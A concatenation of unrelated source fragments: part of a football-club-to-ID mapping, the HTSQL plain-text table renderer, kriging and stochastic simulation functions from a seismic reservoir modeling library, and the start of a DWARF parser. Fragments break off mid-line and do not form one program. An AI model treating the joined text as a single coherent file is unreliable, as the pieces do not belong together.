'sv wehen wiesbaden u17': 'ce01ae4e',
'sv wehen wiesbaden u19': 'd45eb7dc',
'sv werder bremen': '7adbf480',
'werder bremen': '7adbf480',
'sv werder bremen ii': '27020d71',
'werder bremen ii': '27020d71',
'sv werder bremen u17': '454cd859',
'sv werder bremen u19': '9811e0ce',
'tennis borussia berlin u17': 'ffc956ac',
'tsg 1881 sprockhövel u19': 'f858aad6',
'tsg 1881 sprockhovel u19': 'f858aad6',
'tsg 1899 hoffenheim': '033ea6b8',
'hoffenheim': '87705c62',
'tsg 1899 hoffenheim frauen': '87705c62',
'tsg 1899 hoffenheim u17': '6de8c4a5',
'tsg 1899 hoffenheim u19': '0d978394',
'tsv 1860 münchen': '2fbdf057',
'1860 munich': '2fbdf057',
'tsv 1860 münchen u17': '94c74217',
'tsv 1860 munchen u17': '94c74217',
'tsv 1860 münchen u19': 'e16a2df0',
'tsv 1860 munchen u19': 'e16a2df0',
'tsv fortuna 95 düsseldorf u17': '5d67715c',
'tsv fortuna 95 dusseldorf u17': '5d67715c',
'tsv fortuna 95 düsseldorf u19': 'e2bede9e',
'tsv fortuna 95 dusseldorf u19': 'e2bede9e',
'tsv steinbach': 'e17dbcf6',
'tus dassendorf': '4cb3a7df',
'tus erndtebrück': 'c6ed9aad',
'tus erndtebruck': 'c6ed9aad',
'tus koblenz': 'b90ae239',
'koblenz': 'b90ae239',
'tus rot-weiß koblenz': '152320d0',
'tus rot weiss koblenz': '152320d0',
'tus schwachhausen': '3a7a5f05',
'tus wörrstadt': 'aa5142ce',
'tus worrstadt': 'aa5142ce',
'usc paloma': '2ec979d4',
'vfb eichstätt': '90d37df2',
'vfb eichstatt': '90d37df2',
'vfb germania halberstadt': '8c6d7dee',
'vfb lübeck': '57ea79cd',
'lubeck': '57ea79cd',
'vfb stuttgart': '598bc722',
'stuttgart': '598bc722',
'vfb stuttgart ii': '2959ee71',
'stuttgart ii': '2959ee71',
'vfb stuttgart u17': 'f516c444',
'vfb stuttgart u19': '6928de6d',
'vfl bochum': 'b42c6323',
'bochum': 'b42c6323',
'vfl bochum 1848 u17': '37a68655',
'vfl bochum 1848 u19': '5f0284ea',
'vfl osnabrück': '3ce4e72c',
'osnabruck': '3ce4e72c',
'vfl osnabrück u19': 'a036ca44',
'vfl osnabruck u19': 'a036ca44',
'vfl wolfsburg': 'a1393014',
'wolfsburg': 'a1393014',
'vfl wolfsburg u17': 'aabd9798',
'vfl wolfsburg u19': '4f4b03ee',
'vfr aalen': 'eb207015',
'aalen': 'eb207015',
'walddörfer sv': 'd45bef5d',
'walddorfer sv': 'd45bef5d',
'wormatia worms': '0ac19e63',
'wuppertaler sv': '864e4c89',
'wuppertaler': '864e4c89',
'wuppertaler sv u17': '05111478',
'wuppertaler sv u19': 'ff6f8fac',
'würzburger kickers': '4c2b6cd7',
'wurzburger kickers': '4c2b6cd7',
'europa': '75cd4ee3',
'lincoln red imps': '2d3c1b6d',
"st. joseph's": 'bb780485',
'st josephs': 'bb780485',
'<NAME>': '9478ac3f',
'larissa': '9478ac3f',
'aek athens': 'd5348c80',
'<NAME>': '4f49b6c8',
'akratitos': '35896cb2',
'amazones dramas': '235ba9cc',
'aok kerkyra': '4a3e2e72',
'kerkyra': '4a3e2e72',
'apollon pontou': 'd1892beb',
'apollon smyrni': 'e205e89a',
'aris thessaloniki': 'edddfa63',
'aris': 'edddfa63',
'asteras tripoli': 'd884c383',
'athinaikos': '90cf7406',
'atromitos': 'c9607f44',
'chalkidona': '21a657ba',
'doxa drama': '5db4600d',
'egaleo': '9b1d00dc',
'elpides karditsas': '11864fb0',
'ergotelis': '65e32bbe',
'ethnikos asteras': '430a9acb',
'ionikos': 'cba90a8e',
'iraklis thessaloniki': 'fd5c91e2',
'kalamata': '43741223',
'kallithea': '231a223e',
'kavala': '42b3181c',
'levadiakos': '2fb7213e',
'niki volos': '295b8c9d',
'ofi crete': '80b1ef30',
'olympiacos': '2fdb4aef',
'olympiacos volou 1937': '147dfe83',
'olympiacos volou': '147dfe83',
'panachaiki': '88b99a6a',
'panathinaikos': 'f3a5726c',
'panetolikos': '6fc21c65',
'paniliakos': 'd0a46fad',
'panionios': '1ad6cc2c',
'panserraikos': '31b8553d',
'panthrakikos': '5c3a0304',
'paok': '1b3af73b',
'paok wf': '1b3af73b',
'pas giannina': '6507d2b8',
'pas lamia 1964': '890cfc60',
'pas lamia': '890cfc60',
'platanias': '98f7f8ec',
'proodeftiki': 'e81ed996',
'thrasyvoulos': '57032e88',
'veria': '5e71893d',
'volos n.f.c.': '4a2c27a3',
'volos nfc': '4a2c27a3',
'xanthi': 'fdaa51b4',
'asc le siroco': '635b7f12',
'phare du canal': '131b6d6f',
'unité sainte-rosienne': 'abdf207a',
'unite sainte rosienne': 'abdf207a',
'balmazújvárosi': 'c2dbad3b',
'balmazujvaros': 'c2dbad3b',
'békéscsaba 1912 előre se': '542426e5',
'bekescsaba': '542426e5',
'bsiófok': '1c2a42f8',
'siofok': '1c2a42f8',
'budapest honvéd': '8cac5dfa',
'honved': '8cac5dfa',
'debreceni vsc': 'e24ac92e',
'debrecen': 'e24ac92e',
'diósgyőri vtk': 'e4babb95',
'diosgyor': 'e4babb95',
'dunaújváros': '17956b6e',
'dunaujvaros': '173a9410',
'dunaújváros pase': '173a9410',
'egri': '79c71c79',
'eger': '79c71c79',
'sopron': '13437197',
'tatabánya': 'd1db919f',
'tatabanya': 'd1db919f',
'ferencvárosi tc': 'fd573be7',
'ferencvaros': 'fd573be7',
'gyirmót győr': 'e0cc29a7',
'gyirmot': 'e0cc29a7',
'győri eto': '4149e9fd',
'gyor': '4149e9fd',
'kaposvári rákóczi': 'cf01a01d',
'kaposvar': 'cf01a01d',
'kecskeméti te': 'e56b19e1',
'kecskemet': 'e56b19e1',
'kisvárda': '2f78fc78',
'kisvarda': '2f78fc78',
'mezőkövesdi se': 'cab13f30',
'mezokovesd': 'cab13f30',
'mol fehérvár': 'a338349f',
'fehervar': 'a338349f',
'mtk budapest': 'e44db2c6',
'mtk hungária': 'fd1a6b48',
'mtk hungaria': 'fd1a6b48',
'nyíregyháza spartacus': '44c4d76e',
'nyiregyhaza': '44c4d76e',
'paksi': 'db2b616c',
'paks': 'db2b616c',
'pápai': '342a7523',
'papa': '342a7523',
'pécsi mfc': '814f0e43',
'pecs': '814f0e43',
'puskás akadémia': '6cf72eb0',
'puskas akademia': '6cf72eb0',
'rákospalotai eac': '1656f6c9',
'rakospalotai eac': '1656f6c9',
'szolnoki máv': '2abc7dc3',
'szolnok': '2abc7dc3',
'szombathelyi haladás': 'd9995c97',
'haladas': 'd9995c97',
'újpest': '108607cf',
'ujpest': '108607cf',
'vác': 'bd9d2d98',
'vac': 'bd9d2d98',
'vasas': 'bbb935cb',
'zalaegerszegi te': '5f778322',
'zalaegerszeg': '5f778322',
'breiðablik ubk': '4a29fb1c',
'breidablik': '005a8517',
'breidablik ubk': '4a29fb1c',
'fimleikafélag hafnarfjarðar': '9ac2ced1',
'fimleikafelag hafnarfjardar': '9ac2ced1',
'fylkir': '323cb7e4',
'íþróttabandalag akraness': '7ae2a403',
'ithrottabandalag akraness': '7ae2a403',
'íþróttabandalag vestmannaeyja': 'e0afb445',
'ithrottabandalag vestmannaeyja': 'e0afb445',
'keflavík íf': 'a3647d2e',
'keflavik if': 'a3647d2e',
'knattspyrnufélag reykjavíkur': 'ae156985',
'knattspyrnufelag reykjavikur': 'ae156985',
'knattspyrnufélagið fram': '5a8bd0bd',
'knattspyrnufelagid fram': '5a8bd0bd',
'knattspyrnufélagið víkingur': 'ead990c4',
'knattspyrnufelagid vikingur': 'ead990c4',
'leiknir reykjavík': '0c017aa1',
'leiknir reykjavik': '0c017aa1',
'stjarnan': '50fbb58d',
'umf stjarnan': '50fbb58d',
'valur': 'b838366a',
'þór akureyri': '108d3492',
'thor akureyri': '108d3492',
'þór/ka': '6d12ffd1',
'thorka': '6d12ffd1',
'aizawl': '372caef1',
'atk': '48d29768',
'bengaluru': 'd6997457',
'bharat': 'd8b3d23e',
'chennai city': '98d49ef1',
'chennaiyin': '6f0be699',
'churchill brothers goa': '89d54d32',
'churchill brothers': '89d54d32',
'delhi dynamos': '238b245d',
'dempo sc': '800bf6c9',
'dempo': '800bf6c9',
'dsk shivajians': '3d7fb0b3',
'goa': '3249478a',
'pune city': 'f02dca48',
'gokulam kerala': 'db891982',
'hyderabad': 'dd6945f1',
'indian arrows': '6514b7f2',
'jamshedpur': 'abe09747',
'kerala blasters': '38c56c1f',
'minerva punjab': '8f8b1984',
'mohammedan sc': '472a48f2',
'mohammedan': '472a48f2',
'mohun bagan ac': '5c7eb1c7',
'mohun bagan': '5c7eb1c7',
'mumbai city': '1ae5d154',
'mumbai': '9093f7b9',
'neroca': '2a38baa5',
'northeast united': '142886c3',
'pune': 'e64cb540',
'quess east bengal': '366f89ff',
'east bengal': '366f89ff',
'rangdajied united': 'd38f5d45',
'real kashmir': 'd344b030',
'royal wahingdoh': '66314a02',
'salgaocar': '9a006bb8',
'shillong lajong': '5ae2e6b4',
'sporting clube de goa': '47fe048b',
'sporting goa': '47fe048b',
'trau': '9a1cbee5',
'united sc': '00e4df11',
'united': '00e4df11',
'esteghlal ahvaz': '633d46e8',
'esteghlal khuzestan': 'dbad5f2c',
'esteghlal tehran': 'fe550dbf',
'esteghlal': 'fe550dbf',
'nassaji mazandaran': '2c45d10e',
'pars jonoubi jam': '5835aae0',
'foolad khuzestan': 'aa3eb1d3',
'foolad': 'aa3eb1d3',
'gol gohar': '2f5578dd',
'gostaresh foulad': '4bccf0f1',
'machine sazi': '098a7982',
'malavan': 'e4ec7ab0',
'naft masjed soleyman': '3e358749',
'naft tehran': '76d09801',
'padideh shahr-e khodrou': '9f29d583',
'padideh': '9f29d583',
'paykan': 'c659a2f9',
'persepolis': '95f42e44',
'rah ahan tehran': '8f02154a',
'saba qom': 'd9a003fb',
'saipa': '6b849eeb',
'sanat naft abadan': '9fc3b195',
'sepahan sc': 'e39cf61a',
'sepahan': 'e39cf61a',
'sepidrood rasht sc': 'df40b697',
'sepidrood rasht': 'df40b697',
'shahin shahrdari bushehr': '67645960',
'shahin bushehr': '67645960',
'siah jamegan': '9c740560',
'tractor sc': '0230c3aa',
'tractor': '0230c3aa',
'zob ahan sc': 'f8106fc0',
'zob ahan': 'f8106fc0',
'bohemian': '2cf146dc',
'cork city': '4936d1b7',
'derry city': '15f9a98b',
'drogheda united': '359432b5',
'dundalk': 'e4a9d483',
'raheny united': '52be9595',
'shamrock rovers': 'f082c4f3',
'shelbourne': '4f782ba7',
'shelbourne ladies': '4f782ba7',
'sligo rovers': '0baacc84',
'sporting fingal': '4bcb8a56',
"st patrick's athletic": '8a814429',
'st patricks athletic': '8a814429',
'university college dublin afc': '04dcef70',
'wexford youths wfc': '4ef30319',
'wexford youths': '4ef30319',
'asa tel aviv university': '2bec921d',
'beitar jerusalem': '79000faa',
'bnei yehuda tel aviv': '1040e0f7',
'kiryat gat': '889b0f75',
'<NAME>': '931cb21e',
"hapoel be'er sheva": '133013ee',
'hapoel beer sheva': '133013ee',
'hapoel haifa': '8ff9960d',
'hapoel ironi | |
#
# Copyright (c) 2006-2013, Prometheus Research, LLC
#
"""
:mod:`htsql.core.fmt.text`
==========================
This module implements the plain text renderer.
"""
from ..adapter import Adapter, adapt, adapt_many
from ..util import maybe, oneof
from ..context import context
from .format import TextFormat
from .emit import EmitHeaders, Emit
from ..domain import (Domain, BooleanDomain, NumberDomain, IntegerDomain,
DecimalDomain, FloatDomain, TextDomain, EnumDomain, DateDomain,
TimeDomain, DateTimeDomain, ListDomain, RecordDomain, UntypedDomain,
VoidDomain, OpaqueDomain, Profile)
from ..tr.pipe import SQLPipe
import re
import decimal
import datetime
class EmitTextHeaders(EmitHeaders):
adapt(TextFormat)
def __call__(self):
yield ('Content-Type', 'text/plain; charset=UTF-8')
class EmitText(Emit):
adapt(TextFormat)
def __call__(self):
addon = context.app.htsql
product_to_text = profile_to_text(self.meta)
size = product_to_text.size
if size == 0:
return
widths = product_to_text.widths(self.data)
depth = product_to_text.head_depth()
head = product_to_text.head(depth)
if depth > 0:
bar = [(None, 0)]*size
for row_idx in range(depth):
row = next(head, [])
last_bar = bar
bar = []
while len(bar) < size:
idx = len(bar)
text, tail = last_bar[idx]
if tail > 0:
bar.append((text, tail-1))
else:
text, rowspan, colspan = row.pop(0)
bar.append((text, rowspan-1))
for span in range(colspan-1):
bar.append((None, rowspan-1))
assert not row
if row_idx > 0:
line = [" "]
for idx in range(0, size+1):
is_horiz = False
is_vert = False
if idx > 0:
text, tail = last_bar[idx-1]
if tail == 0:
is_horiz = True
if idx < size:
text, tail = last_bar[idx]
if tail == 0:
is_horiz = True
if idx < size:
text, tail = last_bar[idx]
if text is not None:
is_vert = True
text, tail = bar[idx]
if text is not None:
is_vert = True
else:
is_vert = True
if is_horiz and is_vert:
line.append("+")
elif is_horiz:
line.append("-")
elif is_vert:
line.append("|")
else:
line.append(" ")
if idx < size:
text, tail = last_bar[idx]
if tail == 0:
line.append("-"*(widths[idx]+2))
else:
line.append(" "*(widths[idx]+2))
else:
line.append("\n")
yield "".join(line)
extent = 0
line = []
for idx in range(size):
text, tail = bar[idx]
if text is not None:
assert extent == 0, extent
line.append(" | ")
else:
if extent < 3:
line.append(" "*(3-extent))
extent = 0
else:
extent -= 3
width = widths[idx]
if text is not None and tail == 0:
line.append(text)
extent = len(text)
if extent < width:
line.append(" "*(width-extent))
extent = 0
else:
extent -= width
assert extent == 0
line.append(" |\n")
yield "".join(line)
line = ["-+-"]
for width in widths:
line.append("-"*width)
line.append("-+-")
line.append("\n")
yield "".join(line)
body = product_to_text.body(self.data, widths)
for row in body:
line = []
is_last_solid = False
for chunk, is_solid in row:
if is_last_solid or is_solid:
line.append(" | ")
else:
line.append(" : ")
line.append(chunk)
is_last_solid = is_solid
if is_last_solid:
line.append(" |\n")
else:
line.append(" :\n")
yield "".join(line)
yield "\n"
if addon.debug and (self.meta.syntax or hasattr(self.product, 'sql')):
yield " ----\n"
if self.meta.syntax:
yield " %s\n" % self.meta.syntax
if hasattr(self.product, 'sql'):
sql = re.sub(r'[\0-\x09\x0b-\x1f\x7f]', '\ufffd',
self.product.sql)
for line in sql.splitlines():
if line:
yield " %s\n" % line
else:
yield "\n"
class ToText(Adapter):
adapt(Domain)
def __init__(self, domain):
self.domain = domain
self.size = 1
def __call__(self):
return self
def head_depth(self):
return 0
def head(self, depth):
if not self.size or not depth:
return
yield [("", depth, self.size)]
def body(self, data, widths):
[width] = widths
cell = self.dump(data)
yield [("%*s" % (-width, cell), True)]
def widths(self, data):
return [len(self.dump(data))]
def dump(self, value):
if value is None:
return ""
return self.domain.dump(value)
class TextToText(ToText):
adapt_many(UntypedDomain,
TextDomain,
EnumDomain)
threshold = 32
boundary_pattern = r"""(?<=\S) (?=\S)"""
boundary_regexp = re.compile(boundary_pattern)
unescaped_pattern = r"""\A(?=[^ "])[^\x00-\x1F]+(?<=[^ "])\Z"""
unescaped_regexp = re.compile(unescaped_pattern)
escape_pattern = r"""[\x00-\x1F"\\]"""
escape_regexp = re.compile(escape_pattern)
escape_table = {
'\\': '\\\\',
'"': '\\"',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
}
def escape_replace(self, match):
char = match.group()
if char in self.escape_table:
return self.escape_table[char]
return "\\u%04x" % ord(char)
def escape(self, value):
if self.unescaped_regexp.match(value):
return value
return '"%s"' % self.escape_regexp.sub(self.escape_replace, value)
def body(self, data, widths):
[width] = widths
if data is None:
yield [(" "*width, True)]
return
value = self.escape(data)
if len(value) <= width:
yield [("%*s" % (-width, value), True)]
return
chunks = self.boundary_regexp.split(value)
best_badnesses = []
best_lengths = []
best_sizes = []
for idx in range(len(chunks)):
chunk = chunks[idx]
best_badness = None
best_size = None
best_length = None
length = len(chunk)
size = 1
while length <= width and idx-size >= -1:
if size > idx:
badness = 0
else:
tail = width - best_lengths[idx-size]
badness = best_badnesses[idx-size] + tail*tail
if best_badness is None or best_badness > badness:
best_badness = badness
best_size = size
best_length = length
if idx >= size:
length += len(chunks[idx-size]) + 1
size += 1
assert best_badness is not None and best_length <= width
best_badnesses.append(best_badness)
best_lengths.append(best_length)
best_sizes.append(best_size)
lines = []
idx = len(chunks)
while idx > 0:
size = best_sizes[idx-1]
group = " ".join(chunks[idx-size:idx])
assert len(group) <= width
line = "%*s" % (-width, group)
lines.insert(0, line)
idx -= size
is_first = True
for line in lines:
yield [(line, is_first)]
is_first = False
def widths(self, data):
if data is None:
return [0]
value = self.escape(data)
if len(value) <= self.threshold:
return [len(value)]
chunks = self.boundary_regexp.split(value)
max_length = max(len(chunk) for chunk in chunks)
if max_length >= self.threshold:
return [max_length]
max_length = length = 0
start = end = 0
while end < len(chunks):
length += len(chunks[end])
if end != 0:
length += 1
end += 1
while length > self.threshold:
length -= len(chunks[start])
if start != 0:
length -= 1
start += 1
assert start < end
if length > max_length:
max_length = length
return [max_length]
class NativeStringToText(ToText):
adapt_many(NumberDomain,
DateDomain,
TimeDomain)
def dump(self, value):
if value is None:
return ""
return str(value)
class NumberToText(NativeStringToText):
adapt(NumberDomain)
def body(self, data, widths):
[width] = widths
cell = self.dump(data)
yield [("%*s" % (width, cell), True)]
class DecimalToText(ToText):
adapt(DecimalDomain)
def dump(self, value):
if value is None:
return ""
sign, digits, exp = value.as_tuple()
if not digits:
return str(value)
if exp < -6 and value == value.normalize():
value = value.normalize()
sign, digits, exp = value.as_tuple()
if exp > 0:
# Guard against InvalidOperation:
# quantize result has too many digits for current context
if exp+len(digits) < 28:
value = value.quantize(decimal.Decimal(1))
return "{:.12}".format(value)
class FloatToText(ToText):
adapt(FloatDomain)
def dump(self, value):
if value is None:
return ""
return "{:.12}".format(value)
class DateTimeToText(ToText):
adapt(DateTimeDomain)
def dump(self, value):
if value is None:
return ""
elif not value.time():
return str(value.date())
else:
return str(value)
class OpaqueToText(ToText):
adapt(OpaqueDomain)
def dump(self, value):
if value is None:
return ""
return str(value)
class VoidToText(ToText):
adapt(VoidDomain)
def __init__(self, domain):
super(VoidToText, self).__init__(domain)
self.size = 0
class RecordToText(ToText):
adapt(RecordDomain)
def __init__(self, domain):
super(RecordToText, self).__init__(domain)
self.fields_to_text = [profile_to_text(field)
for field in domain.fields]
self.size = sum(field_to_text.size
for field_to_text in self.fields_to_text)
def head_depth(self):
if not self.size:
return 0
return max(field_to_text.head_depth()
for field_to_text in self.fields_to_text)
def head(self, depth):
if not self.size or not depth:
return
streams = [field_to_text.head(depth)
for field_to_text in self.fields_to_text]
is_done = False
while not is_done:
is_done = True
row = []
for stream in streams:
subrow = next(stream, None)
if subrow is not None:
row.extend(subrow)
is_done = False
if not is_done:
yield row
def body(self, data, widths):
if not self.size:
return
dummies = [(" "*width, False) for width in widths]
if data is None:
yield dummies
return
streams = []
start = 0
for field_to_text, item in zip(self.fields_to_text, data):
size = field_to_text.size
stream = field_to_text.body(item, widths[start:start+size])
streams.append((stream, size))
start += size
is_done = False
while not is_done:
is_done = True
row = []
for stream, size in streams:
subrow = next(stream, None)
if subrow is not None:
row.extend(subrow)
is_done = False
else:
row.extend(dummies[len(row):len(row)+size])
if not is_done:
yield row
def widths(self, data):
widths = []
if data is None:
data = [None]*self.size
for item, field_to_text in zip(data, self.fields_to_text):
widths += field_to_text.widths(item)
return widths
class ListToText(ToText):
adapt(ListDomain)
def __init__(self, domain):
self.item_to_text = to_text(domain.item_domain)
self.size = self.item_to_text.size
def head_depth(self):
return self.item_to_text.head_depth()
def head(self, depth):
return self.item_to_text.head(depth)
def body(self, data, widths):
if not data:
return
for item in data:
for row in self.item_to_text.body(item, widths):
yield row
def widths(self, data):
widths = [0]*self.size
if not data:
data = [None]
for item in data:
widths = [max(width, item_width)
for width, item_width
in zip(widths, self.item_to_text.widths(item))]
return widths
class MetaToText:
def __init__(self, profile):
self.profile = profile
self.domain_to_text = to_text(profile.domain)
self.size = self.domain_to_text.size
def head_depth(self):
depth = self.domain_to_text.head_depth()
if self.profile.header:
depth += 1
return | |
<gh_stars>10-100
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 20:05:53 2020
@author: dariograna
"""
import numpy as np
import numpy.matlib
from numpy.linalg import matrix_power
import scipy .spatial
def CorrelatedSimulation(mprior, sigma0, sigmaspace):
"""
CORRELATED SIMULATION
Generates 1D stochastic realizations of correlated
multiple random variables with a spatial correlation model.
Written by <NAME> (August 2020)
Parameters
----------
mprior : array_like
Prior trend (nsamples, nvariables).
sigma0 : array_like
Stationary covariance matrix (nvariables, nvariables).
sigmaspace : array_like
Spatial covariance matrix (nsamples, nsamples).
Returns
-------
msim : array_like
Stochastic realization (nsamples, nvariables).
References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.6
"""
# initial parameters
nm = mprior.shape[1]
ns = mprior.shape[0]
# spatial covariance matrix
sigma = np.kron(sigma0, sigmaspace)
# spatially correlated realization
mreal = np.random.multivariate_normal(mprior.T.flatten(), sigma)
msim = np.zeros((ns, nm))
for i in range(nm):
msim[:,i] = mreal[i*ns:(i+1)*ns]
return msim
def ExpCov(h, l):
"""
EXP COV
Computes the exponential covariance function.
Written by <NAME> (August 2020)
Parameters
----------
h : float or array_like
Distance.
l : float or array_like
Correlation length (or range).
Returns
-------
C : array_like
Covariance.
References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.2
"""
# covariance function
C = np.exp(-3 * h / l)
return C
def GauCov(h, l):
"""
GAU COV
Computes the Gaussian covariance function.
Written by <NAME> (August 2020)
Parameters
----------
h : float or array_like
Distance.
l : float or array_like
Correlation length (or range).
Returns
-------
C : array_like
Covariance.
References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.2
"""
# covariance function
C = np.exp(-3 * h ** 2 / l ** 2)
return C
def SphCov(h, l):
"""
SPH COV
Computes the spherical covariance function.
Written by <NAME> (August 2020)
Parameters
----------
h : float or array_like
Distance.
l : float or array_like
Correlation length (or range).
Returns
-------
C : array_like
Covariance.
References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.2
"""
# covariance function
C = np.zeros(h.shape)
#C(h <= l).lvalue = 1 - 3 / 2 * h(h <= l) / l + 1 / 2 * h(h <= l) ** 3 / l ** 3
C[h <= l] = 1 - 3 / 2 * h[h <= l] / l + 1 / 2 * h[h <= l] ** 3 / l ** 3
return C
def GaussianSimulation(xcoord, dcoords, dvalues, xmean, xvar, l, krigtype, krig):
"""
GAUSSIAN SIMULATION
Generates a realization of the random variable conditioned on
the available measurements.
Written by <NAME> (August 2020)
Parameters
----------
xcoord : array_like
Coordinates of the location for the estimation (1, ndim).
dcoords : array_like
Coordinates of the measurements (ns, ndim).
dvalues : array_like
Values of the measurements (ns, 1).
xmean : float
Prior mean.
xvar : float
Prior variance.
h : float
Distance.
l : float
Correlation length.
krigtype : str
Function type ('exp', 'gau', 'sph').
krig : int
Kriging type (0=simple, 1=ordinary).
Returns
-------
sgsim : array_like
Realization (nsamples, nvariables).
References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.5
"""
if krig == 0:
krigmean, krigvar = SimpleKriging(xcoord, dcoords, dvalues, xmean, xvar, l, krigtype)
else:
krigmean, krigvar = OrdinaryKriging(xcoord, dcoords, dvalues, xvar, l, krigtype)
# realization
sgsim = krigmean + np.sqrt(krigvar) * np.random.randn(1)
return sgsim
def IndicatorKriging(xcoord, dcoords, dvalues, nf, pprior, l, krigtype):
"""
INDICATOR KRIGING
Computes the indicator kriging estimate and variance.
Written by <NAME> (August 2020)
Parameters
----------
xcoord : array_like
Coordinates of the location for the estimation (1, ndim).
dcoords : array_like
Coordinates of the measurements (ns, ndim).
dvalues : array_like
Values of the measurements (ns, 1).
nf : int
Number of possible outcomes (e.g. number of facies).
pprior : array_like
Prior probability (1, nf).
h : float or array_like
Distance.
l : float or array_like
Correlation range, for different range for each facies
(array with nf components).
krigtype : str
Function type ('exp', 'gau', 'sph') for different type for each facies,
(array with nf components).
Returns
-------
ikp : array_like
Indicator kriging probability.
ikmap : array_like
Maximum a posteriori of indicator kriging probability.
References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 4.1
"""
# If l and krigtype are single parameters, use it for all facies
if type(l)==float:
l = np.tile(l, (nf, 1))
if type(krigtype)==str:
krigtype = np.tile(krigtype, (nf, 1))
# indicator variables
nd = dvalues.shape[0]
indvar = np.zeros((nd, nf))
for i in range(nd):
indvar[i, dvalues[i].astype(int)] = 1
# kriging weights
xdtemp = scipy.spatial.distance.squareform(scipy.spatial.distance.pdist(np.vstack((xcoord, dcoords))))
distvect = xdtemp[1:,0]
distmatr = xdtemp[1:,1:]
varprior = np.zeros((1,nf))
krigvect = np.zeros((nd,nf))
krigmatr = np.zeros((nd,nd,nf))
wkrig = np.zeros((nd, nf))
for j in range(nf):
varprior[:,j]= pprior[j] * (1 - pprior[j])
krigvect[:,j]= varprior[:,j] * SpatialCovariance1D(distvect, l[j], krigtype[j])
krigmatr[:,:,j] = varprior[:,j] * SpatialCovariance1D(distmatr, l[j], krigtype[j])
wkrig[:,j] = np.linalg.lstsq(krigmatr[:,:,j], krigvect[:,j],rcond=None)[0]
# indicator kriging probability
ikp = np.zeros((1, nf))
for j in range(nf):
ikp[0,j] = pprior[j] + sum(wkrig[:,j] * (indvar[:,j]- pprior[j]))
# Should we only normalize ikp, do we have to truncate?
#ikp[ikp<0] = 0;ikp[ikp>1] = 1
ikp = ikp/ikp.sum()
ikmap = np.argmax(ikp, axis=1)
return ikp, ikmap
def OrdinaryKriging(xcoord, dcoords, dvalues, xvar, l, krigtype):
"""
ORDINARY KRIGING
Computes the ordinary kriging estimate and variance.
Written by <NAME> (August 2020)
Parameters
----------
xcoord : array_like
Coordinates of the location for the estimation (1, ndim).
dcoords : array_like
Coordinates of the measurements (ns, ndim).
dvalues : array_like
Values of the measurements (ns, 1).
xvar : float
Prior variance.
l : float
Correlation length
krigtype : str
Function type ('exp', 'gau', 'sph').
Returns
-------
xok : array_like
Kriging estimate.
xvarok : array_like
Kriging variance.
References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.4
"""
# kriging matrix and vector
nd = dcoords.shape[0]
krigmatr = np.ones((nd + 1, nd + 1))
krigvect = np.ones((nd + 1, 1))
xdtemp = scipy.spatial.distance.squareform(scipy.spatial.distance.pdist(np.vstack((xcoord, dcoords))))
distvect = xdtemp[1:,0]
distmatr = xdtemp[1:,1:]
krigvect[0:-1,0] = xvar * SpatialCovariance1D(distvect, l, krigtype)
krigmatr[0:-1,0:-1] = xvar * SpatialCovariance1D(distmatr, l, krigtype)
krigmatr[-1,-1] = 0
# to avoid numerical issue, specially with Gaussian variogram model
krigmatr = krigmatr + 0.000001*xvar*np.eye(krigmatr.shape[0])
# kriging weights
wkrig = np.linalg.lstsq(krigmatr, krigvect,rcond=None)[0]
# kriging mean
# xok = mean(dvalues)+sum(wkrig(1:end-1).*(dvalues-mean(dvalues)));
xok = np.sum(wkrig[0:- 1] * dvalues)
# kriging variance
xvarok = xvar - np.sum(wkrig * krigvect)
return xok, xvarok
def SimpleKriging(xcoord, dcoords, dvalues, xmean, xvar, l, krigtype):
"""
SIMPLE KRIGING
Computes the simple kriging estimate and variance.
Written by <NAME> (August 2020)
Parameters
----------
xcoord : array_like
Coordinates of the location for the estimation (1, ndim).
dcoords : array_like
Coordinates of the measurements (ns, ndim).
dvalues : array_like
Values of the measurements (ns, 1).
xmean : float
Prior mean.
xvar : float
Prior variance.
l : float
Correlation length.
krigtype : str
Function type ('exp', 'gau', 'sph').
Returns
-------
xsk : array_like
Kriging estimate.
xvarsk : array_like
Kriging variance.
References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.4
"""
# kriging matrix and vector
nd = dcoords.shape[0]
krigmatr = np.ones((nd, nd))
krigvect = np.ones((nd, 1))
xdtemp = scipy.spatial.distance.squareform(scipy.spatial.distance.pdist(np.vstack((xcoord, dcoords))))
distvect = xdtemp[1:,0]
distmatr = xdtemp[1:,1:]
krigvect[:,0] = xvar * SpatialCovariance1D(distvect, l, krigtype)
krigmatr = xvar * SpatialCovariance1D(distmatr, l, krigtype)
# to avoid numerical issue, specially with Gaussian variogram model
krigmatr = krigmatr + 0.000001*xvar*np.eye(krigmatr.shape[0])
# kriging weights
wkrig = np.linalg.lstsq(krigmatr, krigvect,rcond=None)[0]
# kriging mean
xsk = xmean + np.sum(wkrig * (dvalues - xmean))
# kriging variance
xvarsk = xvar - np.sum(wkrig * krigvect)
return xsk, xvarsk
def MarkovChainSimulation(T, ns, nsim):
"""
MARKOV CHAIN SIMULATION
Simulates 1D realizations of a discrete random variable based on
a stationary first-order Markov chain with given transition probability matrix.
Written by <NAME> (August 2020)
Parameters
----------
T : array_like
Transition probability matrix.
ns : int
Number of samples.
nsim : int
Number of simulations.
Returns
-------
fsim : array_like
Realizations (ns, nsim).
References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley | |
#!/usr/bin/env python3
"""
DWARF parser minimal implementation.
All references unless states otherwise are for:
DWARF v3, December 20, 2005
"""
"""
Enumeration examples
TI ARM C/C++ Codegen PC v16.9.6.LTS
([], DIE DW_TAG_enumeration_type, size=13, has_children=True
|DW_AT_sibling : AttributeValue(name='DW_AT_sibling', form='DW_FORM_ref4', value=327, raw_value=327, offset=90158)
|DW_AT_name : AttributeValue(name='DW_AT_name', form='DW_FORM_strp', value=b'Direction', raw_value=10704, offset=90162)
